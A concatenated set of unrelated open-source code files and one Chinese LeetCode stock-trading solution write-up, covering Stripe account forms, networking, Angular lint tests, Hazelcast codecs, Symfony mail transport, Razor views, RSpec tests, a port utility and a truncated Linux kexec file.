const { createAccount, createAccountLink } = useManageAccount();
const {
register,
handleSubmit,
formState: { errors },
} = useForm();
const onSubmit = async (e: any) => {
setIsLoading(true);
const params: Stripe.AccountCreateParams = { ...e };
const { id } = await createAccount(params);
await createAccountLink(id);
setIsLoading(false);
};
return (
<div className="mx-auto max-w-[700px] text-center">
<div className="space-y-3">
<h2>チケットオーナーアカウント作成</h2>
<Attention />
<div className="p-10 rounded-lg border border-gray">
<form onSubmit={handleSubmit(onSubmit)} className="text-center">
{inputItems.map((item) => {
return (
<InputLayout key={item.id} item={item} errorMessage={errors}>
<InputType item={item} register={register} />
</InputLayout>
);
})}
<div className="relative py-2 px-5">
<input type="submit" value="送信" />
{isLoading && (
<div className="flex absolute inset-0 justify-center bg-white">
<div className="w-5 h-5 rounded-full border-4 border-blue border-t-transparent animate-spin"></div>
</div>
)}
</div>
</form>
</div>
</div>
</div>
);
};
Create.getLayout = Layout;
export default Create;
|
买卖股票的最佳时机 II
我们必须确定通过交易能够获得的最大利润(对于交易次数没有限制)。为此,我们需要找出那些共同使得利润最大化的买入及卖出价格。
解决方案
方法一:暴力法
这种情况下,我们只需要计算与所有可能的交易组合相对应的利润,并找出它们中的最大利润。
class Solution {
public int maxProfit(int[] prices) {
return calculate(prices, 0);
}
public int calculate(int prices[], int s) {
if (s >= prices.length)
return 0;
int max = 0;
for (int start = s; start < prices.length; start++) {
int maxprofit = 0;
for (int i = start + 1; i < prices.length; i++) {
if (prices[start] < prices[i]) {
int profit = calculate(prices, i + 1) + prices[i] - prices[start];
if (profit > maxprofit)
maxprofit = profit;
}
}
if (maxprofit > max)
max = maxprofit;
}
return max;
}
}
复杂度分析
时间复杂度:O(n^n)O(n
n
),调用递归函数 n^nn
n
次。
空间复杂度:O(n)O(n),递归的深度为 nn。
方法二:峰谷法
算法
假设给定的数组为:
[7, 1, 5, 3, 6, 4]
如果我们在图表上绘制给定数组中的数字,我们将会得到:
Profit Graph
如果我们分析图表,那么我们的兴趣点是连续的峰和谷。
https://pic.leetcode-cn.com/d447f96d20d1cfded20a5d08993b3658ed08e295ecc9aea300ad5e3f4466e0fe-file_1555699515174
用数学语言描述为:
Total Profit= \sum_{i}(height(peak_i)-height(valley_i))
TotalProfit=
i
∑
(height(peak
i
)−height(valley
i
))
关键是我们需要考虑到紧跟谷的每一个峰值以最大化利润。如果我们试图跳过其中一个峰值来获取更多利润,那么我们最终将失去其中一笔交易中获得的利润,从而导致总利润的降低。
例如,在上述情况下,如果我们跳过 peak_ipeak
i
和 valley_jvalley
j
试图通过考虑差异较大的点以获取更多的利润,获得的净利润总是会小与包含它们而获得的静利润,因为 CC 总是小于 A+BA+B。
class Solution {
public int maxProfit(int[] prices) {
int i = 0;
int valley = prices[0];
int peak = prices[0];
int maxprofit = 0;
while (i < prices.length - 1) {
while (i < prices.length - 1 && prices[i] >= prices[i + 1])
i++;
valley = prices[i];
while (i < prices.length - 1 && prices[i] <= prices[i + 1])
i++;
peak = prices[i];
maxprofit += peak - valley;
}
return maxprofit;
}
}
复杂度分析
时间复杂度:O(n)O(n)。遍历一次。
空间复杂度:O(1)O(1)。需要常量的空间。
方法三:简单的一次遍历
算法
该解决方案遵循 方法二 的本身使用的逻辑,但有一些轻微的变化。在这种情况下,我们可以简单地继续在斜坡上爬升并持续增加从连续交易中获得的利润,而不是在谷之后寻找每个峰值。最后,我们将有效地使用峰值和谷值,但我们不需要跟踪峰值和谷值对应的成本以及最大利润,但我们可以直接继续增加加数组的连续数字之间的差值,如果第二个数字大于第一个数字,我们获得的总和将是最大利润。这种方法将简化解决方案。
这个例子可以更清楚地展现上述情况:
[1, 7, 2, 3, 6, 7, 6, 7]
与此数组对应的图形是:
Profit Graph
https://pic.leetcode-cn.com/6eaf01901108809ca5dfeaef75c9417d6b287c841065525083d1e2aac0ea1de4-file_1555699697692
从上图中,我们可以观察到 A+B+CA+B+C 的和等于差值 DD 所对应的连续峰和谷的高度之差。
class Solution {
public int maxProfit(int[] prices) {
int maxprofit = 0;
for (int i = 1; i < prices.length; i++) {
if (prices[i] > prices[i - 1])
maxprofit += prices[i] - prices[i - 1];
}
return maxprofit;
}
}
复杂度分析
时间复杂度:O(n)O(n),遍历一次。
空间复杂度:O(1)O(1),需要常量的空间。
|
/*
* UDP server wrapper class.
*
* @author Michel Megens
* @email [email protected]
*/
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <lwiot.h>
#include <lwiot/types.h>
#include <lwiot/log.h>
#include <lwiot/stl/string.h>
#include <lwiot/error.h>
#include <lwiot/network/stdnet.h>
#include <lwiot/network/udpclient.h>
#include <lwiot/network/socketudpclient.h>
namespace lwiot
{
SocketUdpClient::SocketUdpClient() : UdpClient(), _socket(nullptr), _noclose(false)
{
}
SocketUdpClient::SocketUdpClient(const IPAddress &addr, uint16_t port, socket_t* srv) :
UdpClient(addr, port), _socket(srv)
{
if(srv == nullptr)
this->init();
else
this->_noclose = true;
}
SocketUdpClient::SocketUdpClient(const lwiot::String &host, uint16_t port) : UdpClient(host, port)
{
this->init();
}
void SocketUdpClient::begin()
{
this->resolve();
this->close();
this->init();
}
void SocketUdpClient::begin(const lwiot::String &host, uint16_t port)
{
this->_host = host;
this->_port = to_netorders(port);
this->begin();
}
void SocketUdpClient::begin(const lwiot::IPAddress &addr, uint16_t port)
{
this->_host = "";
this->_remote = addr;
this->_port = to_netorders(port);
this->begin();
}
void SocketUdpClient::init()
{
remote_addr_t remote;
this->address().toRemoteAddress(remote);
this->_socket = udp_socket_create(&remote);
this->_noclose = false;
}
SocketUdpClient::~SocketUdpClient()
{
this->close();
}
void SocketUdpClient::close()
{
if(!this->_noclose && this->_socket != nullptr) {
socket_close(this->_socket);
this->_socket = nullptr;
}
}
void SocketUdpClient::setTimeout(time_t seconds)
{
UdpClient::setTimeout(seconds);
socket_set_timeout(this->_socket, seconds);
}
ssize_t SocketUdpClient::write(const void *buffer, const size_t& length)
{
remote_addr_t remote;
if(this->_socket == nullptr) {
this->resolve();
this->init();
}
if(this->_socket == nullptr)
return -EINVALID;
this->address().toRemoteAddress(remote);
remote.version = this->address().version();
remote.port = this->port();
return udp_send_to(this->_socket, buffer, length, &remote);
}
ssize_t SocketUdpClient::read(void *buffer, const size_t& length)
{
remote_addr_t remote;
if(this->_socket == nullptr) {
this->resolve();
this->init();
}
if(this->_socket == nullptr)
return -EINVALID;
remote.version = this->address().version();
return udp_recv_from(this->_socket, buffer, length, &remote);
}
size_t SocketUdpClient::available() const
{
if(this->_socket == nullptr)
return -EINVALID;
return udp_socket_available(this->_socket);
}
}
|
import * as angularDevkitSchematics from '@angular-devkit/schematics';
import {
SchematicTestRunner,
UnitTestTree,
} from '@angular-devkit/schematics/testing';
import * as path from 'path';
import { readJsonInTree } from '../../src/utils';
const { Tree } = angularDevkitSchematics;
jest.mock(
'@angular-devkit/schematics',
() =>
({
__esModule: true,
...jest.requireActual('@angular-devkit/schematics'),
// For some reason TS (BUT only via ts-jest, not in VSCode) has an issue with this spread usage of requireActual(), so suppressing with any
// eslint-disable-next-line @typescript-eslint/no-explicit-any
} as any),
);
const schematicRunner = new SchematicTestRunner(
'@angular-eslint/schematics',
path.join(__dirname, '../../src/collection.json'),
);
describe('library', () => {
let appTree: UnitTestTree;
beforeEach(() => {
appTree = new UnitTestTree(Tree.empty());
appTree.create('package.json', JSON.stringify({}));
appTree.create(
'angular.json',
JSON.stringify({
$schema: './node_modules/@angular/cli/lib/config/schema.json',
version: 1,
newProjectRoot: 'projects',
projects: {},
}),
);
});
it('should pass all the given options directly to the @schematics/angular schematic', async () => {
const spy = jest.spyOn(angularDevkitSchematics, 'externalSchematic');
const options = {
name: 'bar',
};
expect(spy).not.toHaveBeenCalled();
await schematicRunner
.runSchematicAsync('library', options, appTree)
.toPromise();
expect(spy).toHaveBeenCalledTimes(1);
expect(spy).toHaveBeenCalledWith(
'@schematics/angular',
'library',
expect.objectContaining(options),
);
});
it('should change the lint target to use the @angular-eslint builder', async () => {
const tree = await schematicRunner
.runSchematicAsync('application', { name: 'bar' }, appTree)
.toPromise();
expect(readJsonInTree(tree, 'angular.json').projects.bar.architect.lint)
.toMatchInlineSnapshot(`
Object {
"builder": "@angular-eslint/builder:lint",
"options": Object {
"lintFilePatterns": Array [
"projects/bar/**/*.ts",
"projects/bar/**/*.html",
],
},
}
`);
});
it('should add the ESLint config for the project and delete the TSLint config', async () => {
const tree = await schematicRunner
.runSchematicAsync(
'application',
{ name: 'bar', prefix: 'something-else-custom' },
appTree,
)
.toPromise();
expect(tree.exists('projects/bar/tslint.json')).toBe(false);
expect(tree.read('projects/bar/.eslintrc.json')?.toString())
.toMatchInlineSnapshot(`
"{
\\"extends\\": \\"../../.eslintrc.json\\",
\\"ignorePatterns\\": [
\\"!**/*\\"
],
\\"overrides\\": [
{
\\"files\\": [
\\"*.ts\\"
],
\\"parserOptions\\": {
\\"project\\": [
\\"projects/bar/tsconfig.app.json\\",
\\"projects/bar/tsconfig.spec.json\\",
\\"projects/bar/e2e/tsconfig.json\\"
],
\\"createDefaultProgram\\": true
},
\\"rules\\": {
\\"@angular-eslint/directive-selector\\": [
\\"error\\",
{
\\"type\\": \\"attribute\\",
\\"prefix\\": \\"something-else-custom\\",
\\"style\\": \\"camelCase\\"
}
],
\\"@angular-eslint/component-selector\\": [
\\"error\\",
{
\\"type\\": \\"element\\",
\\"prefix\\": \\"something-else-custom\\",
\\"style\\": \\"kebab-case\\"
}
]
}
},
{
\\"files\\": [
\\"*.html\\"
],
\\"rules\\": {}
}
]
}
"
`);
});
});
|
//
// System.CodeDom CodeDirectiveCollection class
//
// Authors:
// Marek Safar ([email protected])
// Sebastien Pouliot <[email protected]>
//
// (C) 2004 Ximian, Inc.
// Copyright (C) 2005 Novell, Inc (http://www.novell.com)
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
//
#if NET_2_0
using System.Runtime.InteropServices;
namespace System.CodeDom
{
[Serializable]
[ComVisible (true), ClassInterface (ClassInterfaceType.AutoDispatch)]
public class CodeDirectiveCollection: System.Collections.CollectionBase {
public CodeDirectiveCollection ()
{
}
public CodeDirectiveCollection (CodeDirective[] value)
{
AddRange (value);
}
public CodeDirectiveCollection (CodeDirectiveCollection value)
{
AddRange (value);
}
public CodeDirective this [int index] {
get { return (CodeDirective) List [index]; }
set { List [index] = value; }
}
public int Add (CodeDirective value)
{
return List.Add (value);
}
public void AddRange (CodeDirective[] value)
{
if (value == null) {
throw new ArgumentNullException ("value");
}
for (int i = 0; i < value.Length; i++) {
Add (value[i]);
}
}
public void AddRange (CodeDirectiveCollection value)
{
if (value == null) {
throw new ArgumentNullException ("value");
}
int count = value.Count;
for (int i = 0; i < count; i++) {
Add (value[i]);
}
}
public bool Contains (CodeDirective value)
{
return List.Contains (value);
}
public void CopyTo (CodeDirective[] array, int index)
{
List.CopyTo (array, index);
}
public int IndexOf (CodeDirective value)
{
return List.IndexOf (value);
}
public void Insert (int index, CodeDirective value)
{
List.Insert (index, value);
}
public void Remove (CodeDirective value)
{
List.Remove (value);
}
}
}
#endif
|
/*
* Copyright (c) 2008-2020, Hazelcast, Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.hazelcast.client.impl.protocol.codec;
import com.hazelcast.client.impl.protocol.ClientMessage;
import com.hazelcast.client.impl.protocol.Generated;
import com.hazelcast.client.impl.protocol.codec.builtin.*;
import com.hazelcast.client.impl.protocol.codec.custom.*;
import javax.annotation.Nullable;
import static com.hazelcast.client.impl.protocol.ClientMessage.*;
import static com.hazelcast.client.impl.protocol.codec.builtin.FixedSizeTypesCodec.*;
/*
* This file is auto-generated by the Hazelcast Client Protocol Code Generator.
* To change this file, edit the templates or the protocol
* definitions on the https://github.com/hazelcast/hazelcast-client-protocol
* and regenerate it.
*/
/**
* Checks the lock for the specified key.If the lock is acquired then returns true, else returns false.
*/
@Generated("306071f9db7b2ab1e92edc63a77973c7")
public final class MapIsLockedCodec {
//hex: 0x011200
public static final int REQUEST_MESSAGE_TYPE = 70144;
//hex: 0x011201
public static final int RESPONSE_MESSAGE_TYPE = 70145;
private static final int REQUEST_INITIAL_FRAME_SIZE = PARTITION_ID_FIELD_OFFSET + INT_SIZE_IN_BYTES;
private static final int RESPONSE_RESPONSE_FIELD_OFFSET = RESPONSE_BACKUP_ACKS_FIELD_OFFSET + BYTE_SIZE_IN_BYTES;
private static final int RESPONSE_INITIAL_FRAME_SIZE = RESPONSE_RESPONSE_FIELD_OFFSET + BOOLEAN_SIZE_IN_BYTES;
private MapIsLockedCodec() {
}
@edu.umd.cs.findbugs.annotations.SuppressFBWarnings({"URF_UNREAD_PUBLIC_OR_PROTECTED_FIELD"})
public static class RequestParameters {
/**
* name of map
*/
public java.lang.String name;
/**
* Key for the map entry to check if it is locked.
*/
public com.hazelcast.internal.serialization.Data key;
}
public static ClientMessage encodeRequest(java.lang.String name, com.hazelcast.internal.serialization.Data key) {
ClientMessage clientMessage = ClientMessage.createForEncode();
clientMessage.setRetryable(true);
clientMessage.setOperationName("Map.IsLocked");
ClientMessage.Frame initialFrame = new ClientMessage.Frame(new byte[REQUEST_INITIAL_FRAME_SIZE], UNFRAGMENTED_MESSAGE);
encodeInt(initialFrame.content, TYPE_FIELD_OFFSET, REQUEST_MESSAGE_TYPE);
encodeInt(initialFrame.content, PARTITION_ID_FIELD_OFFSET, -1);
clientMessage.add(initialFrame);
StringCodec.encode(clientMessage, name);
DataCodec.encode(clientMessage, key);
return clientMessage;
}
public static MapIsLockedCodec.RequestParameters decodeRequest(ClientMessage clientMessage) {
ClientMessage.ForwardFrameIterator iterator = clientMessage.frameIterator();
RequestParameters request = new RequestParameters();
//empty initial frame
iterator.next();
request.name = StringCodec.decode(iterator);
request.key = DataCodec.decode(iterator);
return request;
}
@edu.umd.cs.findbugs.annotations.SuppressFBWarnings({"URF_UNREAD_PUBLIC_OR_PROTECTED_FIELD"})
public static class ResponseParameters {
/**
* Returns true if the entry is locked, otherwise returns false
*/
public boolean response;
}
public static ClientMessage encodeResponse(boolean response) {
ClientMessage clientMessage = ClientMessage.createForEncode();
ClientMessage.Frame initialFrame = new ClientMessage.Frame(new byte[RESPONSE_INITIAL_FRAME_SIZE], UNFRAGMENTED_MESSAGE);
encodeInt(initialFrame.content, TYPE_FIELD_OFFSET, RESPONSE_MESSAGE_TYPE);
encodeBoolean(initialFrame.content, RESPONSE_RESPONSE_FIELD_OFFSET, response);
clientMessage.add(initialFrame);
return clientMessage;
}
public static MapIsLockedCodec.ResponseParameters decodeResponse(ClientMessage clientMessage) {
ClientMessage.ForwardFrameIterator iterator = clientMessage.frameIterator();
ResponseParameters response = new ResponseParameters();
ClientMessage.Frame initialFrame = iterator.next();
response.response = decodeBoolean(initialFrame.content, RESPONSE_RESPONSE_FIELD_OFFSET);
return response;
}
}
|
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <[email protected]>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Component\Mailer\Transport;
use Psr\Log\LoggerInterface;
use Psr\Log\NullLogger;
use Symfony\Component\Mailer\Envelope;
use Symfony\Component\Mailer\Event\MessageEvent;
use Symfony\Component\Mailer\SentMessage;
use Symfony\Component\Mime\Address;
use Symfony\Component\Mime\RawMessage;
use Symfony\Contracts\EventDispatcher\EventDispatcherInterface;
/**
* @author Fabien Potencier <[email protected]>
*/
abstract class AbstractTransport implements TransportInterface
{
private $dispatcher;
private $logger;
private $rate = 0;
private $lastSent = 0;
public function __construct(EventDispatcherInterface $dispatcher = null, LoggerInterface $logger = null)
{
$this->dispatcher = $dispatcher;
$this->logger = $logger ?? new NullLogger();
}
/**
* Sets the maximum number of messages to send per second (0 to disable).
*/
public function setMaxPerSecond(float $rate): self
{
if (0 >= $rate) {
$rate = 0;
}
$this->rate = $rate;
$this->lastSent = 0;
return $this;
}
public function send(RawMessage $message, Envelope $envelope = null): ?SentMessage
{
$message = clone $message;
$envelope = null !== $envelope ? clone $envelope : Envelope::create($message);
if (null !== $this->dispatcher) {
$event = new MessageEvent($message, $envelope, (string) $this);
$this->dispatcher->dispatch($event);
$envelope = $event->getEnvelope();
}
$message = new SentMessage($message, $envelope);
$this->doSend($message);
$this->checkThrottling();
return $message;
}
abstract protected function doSend(SentMessage $message): void;
/**
* @param Address[] $addresses
*
* @return string[]
*/
protected function stringifyAddresses(array $addresses): array
{
return array_map(function (Address $a) {
return $a->toString();
}, $addresses);
}
protected function getLogger(): LoggerInterface
{
return $this->logger;
}
private function checkThrottling()
{
if (0 == $this->rate) {
return;
}
$sleep = (1 / $this->rate) - (microtime(true) - $this->lastSent);
if (0 < $sleep) {
$this->logger->debug(sprintf('Email transport "%s" sleeps for %.2f seconds', __CLASS__, $sleep));
usleep($sleep * 1000000);
}
$this->lastSent = microtime(true);
}
}
|
#pragma checksum "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml" "{ff1816ec-aa5e-4d10-87f7-6f4963833460}" "6c93321e6e9b0f148e0449c5902bf5cb7ad221b8"
// <auto-generated/>
#pragma warning disable 1591
[assembly: global::Microsoft.AspNetCore.Razor.Hosting.RazorCompiledItemAttribute(typeof(AspNetCore.Views_Shared__LoginPartial), @"mvc.1.0.view", @"/Views/Shared/_LoginPartial.cshtml")]
namespace AspNetCore
{
#line hidden
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Mvc.Rendering;
using Microsoft.AspNetCore.Mvc.ViewFeatures;
#nullable restore
#line 1 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\_ViewImports.cshtml"
using KombniyApp;
#line default
#line hidden
#nullable disable
#nullable restore
#line 2 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\_ViewImports.cshtml"
using KombniyApp.Models;
#line default
#line hidden
#nullable disable
#nullable restore
#line 1 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
using Asp.NetCore.Identity;
#line default
#line hidden
#nullable disable
[global::Microsoft.AspNetCore.Razor.Hosting.RazorSourceChecksumAttribute(@"SHA1", @"6c93321e6e9b0f148e0449c5902bf5cb7ad221b8", @"/Views/Shared/_LoginPartial.cshtml")]
[global::Microsoft.AspNetCore.Razor.Hosting.RazorSourceChecksumAttribute(@"SHA1", @"cde0cb099000a1d3912655c1fefd364ef5f3e561", @"/Views/_ViewImports.cshtml")]
public class Views_Shared__LoginPartial : global::Microsoft.AspNetCore.Mvc.Razor.RazorPage<dynamic>
{
#pragma warning disable 1998
public async override global::System.Threading.Tasks.Task ExecuteAsync()
{
WriteLiteral("\r\n");
#nullable restore
#line 3 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
if (Request.IsAuthenticated)
{
using (Html.BeginForm("LogOff", "Account", FormMethod.Post, new { id = "logoutForm", @class = "form-inline" }))
{
#line default
#line hidden
#nullable disable
#nullable restore
#line 7 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
Write(Html.AntiForgeryToken());
#line default
#line hidden
#nullable disable
WriteLiteral(" <li class=\"nav-item\">\r\n ");
#nullable restore
#line 9 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
Write(Html.ActionLink("Hi " + User.Identity.GetUserName() + "!", "Index", "Manage", routeValues: null, htmlAttributes: new { title = "Manage", @class = "nav-link waves-effect waves-light" }));
#line default
#line hidden
#nullable disable
WriteLiteral("\r\n </li>\r\n <li class=\"nav-item\"><a class=\"nav-link waves-effect waves-light\" href=\"javascript:document.getElementById(\'logoutForm\').submit()\">Cerrar sesión</a></li>\r\n");
#nullable restore
#line 12 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
}
}
else
{
#line default
#line hidden
#nullable disable
WriteLiteral(" <li class=\"nav-item\">");
#nullable restore
#line 16 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
Write(Html.ActionLink("Register", "Register", "Account", routeValues: null, htmlAttributes: new { id = "registerLink", @class = "nav-link waves-effect waves-light" }));
#line default
#line hidden
#nullable disable
WriteLiteral("</li>\r\n <li class=\"nav-item\">");
#nullable restore
#line 17 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
Write(Html.ActionLink("Login", "Login", "Account", routeValues: null, htmlAttributes: new { id = "loginLink", @class = "nav-link waves-effect waves-light" }));
#line default
#line hidden
#nullable disable
WriteLiteral("</li>\r\n");
#nullable restore
#line 18 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
}
#line default
#line hidden
#nullable disable
}
#pragma warning restore 1998
[global::Microsoft.AspNetCore.Mvc.Razor.Internal.RazorInjectAttribute]
public global::Microsoft.AspNetCore.Mvc.ViewFeatures.IModelExpressionProvider ModelExpressionProvider { get; private set; }
[global::Microsoft.AspNetCore.Mvc.Razor.Internal.RazorInjectAttribute]
public global::Microsoft.AspNetCore.Mvc.IUrlHelper Url { get; private set; }
[global::Microsoft.AspNetCore.Mvc.Razor.Internal.RazorInjectAttribute]
public global::Microsoft.AspNetCore.Mvc.IViewComponentHelper Component { get; private set; }
[global::Microsoft.AspNetCore.Mvc.Razor.Internal.RazorInjectAttribute]
public global::Microsoft.AspNetCore.Mvc.Rendering.IJsonHelper Json { get; private set; }
[global::Microsoft.AspNetCore.Mvc.Razor.Internal.RazorInjectAttribute]
public global::Microsoft.AspNetCore.Mvc.Rendering.IHtmlHelper<dynamic> Html { get; private set; }
}
}
#pragma warning restore 1591
|
describe 'Feature Test: Store', :type => :feature do
describe "Category List" do
it "displays all of the categories as links" do
visit store_path
Category.all.each do |category|
expect(page).to have_link(category.title, href: category_path(category))
end
end
end
describe "Item List" do
it 'displays all items that have inventory' do
second_item = Item.second
second_item.inventory = 0
second_item.save
visit store_path
Item.all.each do |item|
if item == second_item
expect(page).to_not have_content item.title
else
expect(page).to have_content item.title
expect(page).to have_content "$#{item.price.to_f}"
end
end
end
context "not logged in" do
it 'does not display "Add To Cart" button' do
visit store_path
expect(page).to_not have_content "Add To Cart"
end
end
context "logged in" do
before(:each) do
@user = User.first
login_as(@user, scope: :user)
end
it 'does display "Add To Cart" button' do
visit store_path
expect(page).to have_selector("input[type=submit][value='Add to Cart']")
end
end
end
describe 'Headers' do
context "not logged in" do
it 'has a sign in link' do
visit store_path
expect(page).to have_link("Sign In")
end
it 'has a sign up link' do
visit store_path
expect(page).to have_link("Sign Up")
end
end
context "logged in" do
before(:each) do
@user = User.first
login_as(@user, scope: :user)
end
it "tells the user who they are signed in as" do
visit store_path
expect(page).to have_content("Signed in as #{@user.email}")
end
it "has a sign out link" do
visit store_path
expect(page).to have_link("Sign Out")
end
it "lets users sign out" do
visit store_path
click_link("Sign Out")
expect(page.current_path).to eq(store_path)
expect(page).to have_link("Sing In")
end
end
it 'has a Store Home Link' do
visit store_path
expect(page).to have_link("Store Home")
end
it 'does not have a Cart link' do
visit store_path
expect(page).to_not have_link("Cart")
end
end
end
|
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT license.
var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) {
function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); }
return new (P || (P = Promise))(function (resolve, reject) {
function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } }
function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } }
function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); }
step((generator = generator.apply(thisArg, _arguments || [])).next());
});
};
Object.defineProperty(exports, "__esModule", { value: true });
const childProcess = require("child_process");
const crypto = require("crypto");
const net = require("net");
const office_addin_usage_data_1 = require("office-addin-usage-data");
/**
* Determines whether a port is in use.
* @param port port number (0 - 65535)
* @returns true if port is in use; false otherwise.
*/
function isPortInUse(port) {
validatePort(port);
return new Promise((resolve) => {
const server = net
.createServer()
.once("error", () => {
resolve(true);
})
.once("listening", () => {
server.close();
resolve(false);
})
.listen(port);
});
}
exports.isPortInUse = isPortInUse;
/**
* Parse the port from a string which ends with colon and a number.
* @param text string to parse
* @example "127.0.0.1:3000" returns 3000
* @example "[::1]:1900" returns 1900
* @example "Local Address" returns undefined
*/
function parsePort(text) {
const result = text.match(/:(\d+)$/);
return result ? parseInt(result[1], 10) : undefined;
}
/**
* Return the process ids using the port.
* @param port port number (0 - 65535)
* @returns Promise to array containing process ids, or empty if none.
*/
function getProcessIdsForPort(port) {
validatePort(port);
return new Promise((resolve, reject) => {
const isWin32 = process.platform === "win32";
const command = isWin32 ? `netstat -ano` : `lsof -n -i:${port}`;
childProcess.exec(command, (error, stdout) => {
if (error) {
if (error.code === 1) {
// no processes are using the port
resolve([]);
}
else {
reject(error);
}
}
else {
const processIds = new Set();
const lines = stdout.trim().split("\n");
if (isWin32) {
lines.forEach((line) => {
const [protocol, localAddress, foreignAddress, status, processId] = line.split(" ").filter((text) => text);
if (processId !== undefined) {
const localAddressPort = parsePort(localAddress);
if (localAddressPort === port) {
processIds.add(parseInt(processId, 10));
}
}
});
}
else {
lines.forEach((line) => {
const [process, processId, user, fd, type, device, size, node, name] = line.split(" ").filter((text) => text);
if ((processId !== undefined) && (processId !== "PID")) {
processIds.add(parseInt(processId, 10));
}
});
}
resolve(Array.from(processIds));
}
});
});
}
exports.getProcessIdsForPort = getProcessIdsForPort;
/**
* Returns a random port number which is not in use.
* @returns Promise to number from 0 to 65535
*/
function randomPortNotInUse() {
return __awaiter(this, void 0, void 0, function* () {
let port;
do {
port = randomPortNumber();
} while (yield isPortInUse(port));
return port;
});
}
exports.randomPortNotInUse = randomPortNotInUse;
/**
* Returns a random number between 0 and 65535
*/
function randomPortNumber() {
return crypto.randomBytes(2).readUInt16LE(0);
}
/**
* Throw an error if the port is not a valid number.
* @param port port number
* @throws Error if port is not a number from 0 to 65535.
*/
function validatePort(port) {
if ((typeof (port) !== "number") || (port < 0) || (port > 65535)) {
throw new office_addin_usage_data_1.ExpectedError("Port should be a number from 0 to 65535.");
}
}
//# sourceMappingURL=port.js.map |
/*
* machine_kexec.c - handle transition of Linux booting another kernel
* Copyright (C) 2002-2003 Eric Biederman <[email protected]>
*
* GameCube/ppc32 port Copyright (C) 2004 Albert Herranz
* LANDISK/sh4 supported by kogiidena
*
* This source code is licensed under the GNU General Public License,
* Version 2. See the file COPYING for more details.
*/
#include <linux/mm.h>
#include <linux/kexec.h>
#include <linux/delay.h>
#include <linux/reboot.h>
#include <asm/pgtable.h>
#include <asm/pgalloc.h>
#include <asm/mmu_context.h>
#include <asm/io.h>
#include <asm/cacheflush.h>
typedef NORET_TYPE void (*relocate_new_kernel_t)(
unsigned long indirection_page,
unsigned long reboot_code_buffer,
unsigned long start_address,
unsigned long vbr_reg) ATTRIB_NORET;
extern const unsigned char relocate_new_kernel[];
extern const unsigned int relocate_new_kernel_size;
extern void *gdb_vbr_vector;
void machine_shutdown(void)
{
}
void machine_crash_shutdown(struct pt_regs *regs)
{
}
/*
* Do what every setup is needed on image and the
* reboot code buffer to allow us to avoid allocations
* later.
*/
int machine_kexec_prepare(struct kimage *image)
{
return 0;
}
void machine_kexec_cleanup(struct kimage *image)
{
}
static void kexec_info(struct kimage *image)
{
int i;
printk("kexec information\n");
for (i = 0; i < image->nr_segments; i++) {
printk(" segment[%d]: 0x%08x - 0x%08x (0x%08x)\n",
i,
(unsigned int)image->segment[i].mem,
(unsigned int)image->segment[i].mem +
image->segment[i].memsz,
(unsigned int)image->segment[i].memsz);
}
printk(" start : 0x%08x\n\n", (unsigned int)image->start);
}
/*
* Do not allocate memory (or fail in any way) in machine_kexec().
* We are past the point of no return, committed to rebooting now.
*/
NORET_TYPE void machine_kexec(struct kimage *image)
{
unsigned long page_list;
unsigned long reboot_code_buffer;
unsigned long vbr_reg;
relocate_new_kernel_t rnk;
#if defined(CONFIG_SH_STANDARD_BIOS)
vbr_reg = ((unsigned long )gdb_vbr_vector) - 0x100;
#else
